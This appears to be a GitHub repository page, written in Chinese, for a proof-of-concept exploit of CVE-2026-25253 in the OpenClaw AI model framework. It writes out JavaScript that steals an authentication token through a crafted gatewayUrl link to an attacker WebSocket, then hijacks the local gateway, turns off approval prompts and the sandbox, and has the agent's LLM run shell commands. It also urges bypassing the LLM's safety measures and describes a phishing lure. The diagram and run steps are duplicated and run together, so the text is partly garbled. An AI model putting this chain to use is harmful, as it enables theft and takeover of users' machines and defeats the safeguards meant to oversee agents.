KajzingerAkos/CVE-2026-25253
GitHub: KajzingerAkos/CVE-2026-25253
总结了一个利用 OpenClaw 身份验证令牌窃取实现远程代码执行的 PoC 攻击项目。
Stars: 0 | Forks: 0
# CVE-2026-25253:通过身份验证令牌窃取实现一键 RCE
**受影响软件:** OpenClaw (clawbot) < v2026.1.29
**CVE ID:** CVE-2026-25253
**CVSS 评分:** 8.8(高危)
**影响:** 未认证远程攻击者可窃取身份验证令牌并在受害主机上实现远程代码执行(RCE)
---
## 技术背景
OpenClaw,旧称 **Clawdbot**,早期版本称为 **Moltbot**,是一款在 macOS、Windows 或 Linux 上本地运行的 AI 助手框架。它支持 Anthropic 和 OpenAI 等云端模型,也支持本地模型。
**控制界面(Control UI)** 是一个单页应用,通过 `/chat` 提供服务,并通过 WebSocket 与本地网关服务器通信,地址为 `ws://127.0.0.1:18789/`(TLS 下为 `wss://host:18789/`)。
受影响版本的关键安全特性:
- 身份验证令牌和密码存储在 **`localStorage`** 中
- 设备身份通过 **Ed25519 密钥对**(`noble-ed25519`)建立
- WebSocket 协议使用 JSON-RPC 风格消息(`type: "req"`、`"res"`、`"event"`)
- 连接时,控制界面会在首个 `connect` 帧中发送身份验证凭证和设备身份
---
## 根本原因:`applySettingsFromUrl()`
漏洞存在于控制界面中的 [`applySettingsFromUrl()`](https://github.com/openclaw/openclaw/blob/bcedeb4e1f620a50b6e99f1e2b25cc692f0d7bab/ui/src/ui/app-settings.ts#L59)。
当控制界面加载时,此函数会从 URL 中读取 `?gatewayUrl=` 查询参数,并将其 **存储为当前网关端点** —— 不会验证该地址是否指向可信主机。
攻击者可构造如下链接:
```
http:///chat?gatewayUrl=ws://attacker.com
```
当受害者在 OpenClaw 中已登录时点击此链接,会自动发生以下操作:
1. `applySettingsFromUrl()` 将 `ws://attacker.com` 存储为新的网关 URL
2. 控制界面向攻击者服务器建立 WebSocket 连接
3. 控制界面发送其 `connect` 帧 —— 包含 **身份验证令牌**、设备 ID 和 Ed25519 公钥 —— 给攻击者
4. 攻击者捕获令牌并将其重放至真实网关 `ws://127.0.0.1:18789`
5. 攻击者获得在受害机器上的已认证操作会话
---
## 攻击利用
### 第一步:通过弹出窗口窃取令牌
在此 PoC 中,攻击者托管一个页面(`meeting.html`),在弹出窗口中打开受害者的控制界面,并注入恶意的 `?gatewayUrl=` 参数:
```
const attackerGatewayUrl = `ws://:8080`;
const targetUrl = `http://127.0.0.1:18789?gatewayUrl=${encodeURIComponent(attackerGatewayUrl)}`;
window.open(targetUrl, '_blank');
```
攻击者服务器利用 OpenClaw 的双令牌回退机制:首次 `connect` 尝试使用 **设备令牌**(基于 Ed25519,不可重放)。服务器拒绝后,控制界面会重试使用 **设置令牌** —— 一个长期有效的承载令牌 *可重放*:
```
// Reject attempt #1 → forces Control UI to retry with settings token
if (connectAttempts === 1) {
ws.send({ type: 'res', ok: false, error: { code: 'AUTH_FAILED' } });
return;
}
// Attempt #2 → settings token → CAPTURED
capturedToken = token;
```
### 第二步:跨站 WebSocket 劫持
利用窃取的设置令牌,`meeting.html` 开启其 **自身的** 直接 WebSocket 连接至真实网关(`ws://127.0.0.1:18789`)。这是可能的,因为版本 < v2026.1.29 的网关未验证 `Origin` 头 —— 受害者浏览器中加载的任何页面均可连接。
### 第三步:禁用安全控制
```
// Turn off all execution approval prompts
await sendRequest('exec.approvals.set', {
file: {
defaults: { ask: 'off', autoAllowSkills: true },
agents: { '*': { ask: 'off' } },
}
});
// Escape container sandbox, redirect exec to host machine
await sendRequest('config.patch', {
raw: JSON.stringify({
tools: { exec: { host: 'gateway', ask: 'off' } },
agents: { defaults: { sandbox: { mode: 'off' } } },
})
});
```
### 第四步:远程代码执行
消息字段的内容由代理中配置的 LLM 处理,这意味着如果 LLM 认为内容有害,将不会执行命令。你需要创造性地绕过 LLM 的安全措施。
```
await sendRequest('agent', {
message: 'Execute this shell command: ',
agentId: 'main',
sessionKey: 'agent:main:main',
deliver: false,
});
```
---
## 完整攻击流程
```
sequenceDiagram
autonumber
actor Attacker
participant Browser as Victim Browser
(meeting.html) participant CtrlUI as OpenClaw Control UI
(popup @ 127.0.0.1:18789/chat) participant AtkWS as Attacker WS Server
(:8080) participant GW as Real OpenClaw Gateway
(127.0.0.1:18789) participant LLM as Cloud LLM
(OpenAI / Anthropic) Attacker->>Browser: Phishing link → opens meeting.html
(disguised as a Teams invite) Note over Browser: Phase 1 — Token Theft Browser->>CtrlUI: Opens popup with ?gatewayUrl=ws://attacker:8080 Note over CtrlUI: applySettingsFromUrl() stores
attacker WS as active gateway CtrlUI->>AtkWS: connect { auth.token: DEVICE_TOKEN } AtkWS-->>CtrlUI: ✗ AUTH_FAILED (reject — forces retry) CtrlUI->>AtkWS: connect { auth.token: SETTINGS_TOKEN } AtkWS-->>CtrlUI: ✓ hello-ok (fake response) AtkWS->>Browser: token_captured { token: SETTINGS_TOKEN } Note over Browser: Phase 2 — Gateway Hijack (CSWSH) Browser->>GW: WebSocket connect (no Origin validation)
auth { token: SETTINGS_TOKEN } GW-->>Browser: ✓ Authenticated as operator Note over Browser: Phase 3 — Security Bypass Browser->>GW: exec.approvals.set { ask: "off" } GW-->>Browser: ✓ Approval prompts disabled Browser->>GW: config.patch { exec.host: "gateway",
sandbox.mode: "off" } GW-->>Browser: ✓ Sandbox disabled, exec on host Note over Browser: Phase 4 — Remote Code Execution Browser->>GW: agent { message: "Execute shell command: COMMAND" } GW->>LLM: Forward prompt (security already stripped) LLM-->>GW: Tool call: exec("COMMAND") GW->>GW: Runs command on HOST filesystem GW-->>Browser: ✓ Command executed ``` --- ## 运行 PoC ### 环境准备 ``` npm install # installs 'ws' dependency ``` ### 配置 `meeting.html` ``` const GATEWAY_URL = 'ws://127.0.0.1:18789'; // victim's local gateway const ATTACKER_WS_PORT = 8080; // must match attacker-server.js const COMMAND = 'touch /tmp/success'; ``` ### 执行 ``` node attacker-server.js ``` 向受害者发送: ``` http://:3000/meeting.html
```
---
## 参考链接
https://github.com/openclaw/openclaw/security/advisories/GHSA-g8p2-7wf7-98mq
https://www.sonicwall.com/blog/openclaw-auth-token-theft-leading-to-rce-cve-2026-25253
https://hackers-arise.com/cve-2026-25253-how-malicious-links-can-steal-authentication-tokens-and-compromise-openclaw-ai-systems/
(meeting.html) participant CtrlUI as OpenClaw Control UI
(popup @ 127.0.0.1:18789/chat) participant AtkWS as Attacker WS Server
(:8080) participant GW as Real OpenClaw Gateway
(127.0.0.1:18789) participant LLM as Cloud LLM
(OpenAI / Anthropic) Attacker->>Browser: Phishing link → opens meeting.html
(disguised as a Teams invite) Note over Browser: Phase 1 — Token Theft Browser->>CtrlUI: Opens popup with ?gatewayUrl=ws://attacker:8080 Note over CtrlUI: applySettingsFromUrl() stores
attacker WS as active gateway CtrlUI->>AtkWS: connect { auth.token: DEVICE_TOKEN } AtkWS-->>CtrlUI: ✗ AUTH_FAILED (reject — forces retry) CtrlUI->>AtkWS: connect { auth.token: SETTINGS_TOKEN } AtkWS-->>CtrlUI: ✓ hello-ok (fake response) AtkWS->>Browser: token_captured { token: SETTINGS_TOKEN } Note over Browser: Phase 2 — Gateway Hijack (CSWSH) Browser->>GW: WebSocket connect (no Origin validation)
auth { token: SETTINGS_TOKEN } GW-->>Browser: ✓ Authenticated as operator Note over Browser: Phase 3 — Security Bypass Browser->>GW: exec.approvals.set { ask: "off" } GW-->>Browser: ✓ Approval prompts disabled Browser->>GW: config.patch { exec.host: "gateway",
sandbox.mode: "off" } GW-->>Browser: ✓ Sandbox disabled, exec on host Note over Browser: Phase 4 — Remote Code Execution Browser->>GW: agent { message: "Execute shell command: COMMAND" } GW->>LLM: Forward prompt (security already stripped) LLM-->>GW: Tool call: exec("COMMAND") GW->>GW: Runs command on HOST filesystem GW-->>Browser: ✓ Command executed ``` --- ## 运行 PoC ### 环境准备 ``` npm install # installs 'ws' dependency ``` ### 配置 `meeting.html` ``` const GATEWAY_URL = 'ws://127.0.0.1:18789'; // victim's local gateway const ATTACKER_WS_PORT = 8080; // must match attacker-server.js const COMMAND = 'touch /tmp/success'; ``` ### 执行 ``` node attacker-server.js ``` 向受害者发送: ``` http://
标签:CSRF, CVE-2026-25253, Ed25519, JSON-RPC, localStorage, MITM代理, OpenClaw, StruQ, WebSocket, XSS, 依赖分析, 后端开发, 客户端存储, 控制台UI, 数据可视化, 未授权访问, 本地AI框架, 漏洞情报, 编程工具, 认证令牌窃取, 远程代码执行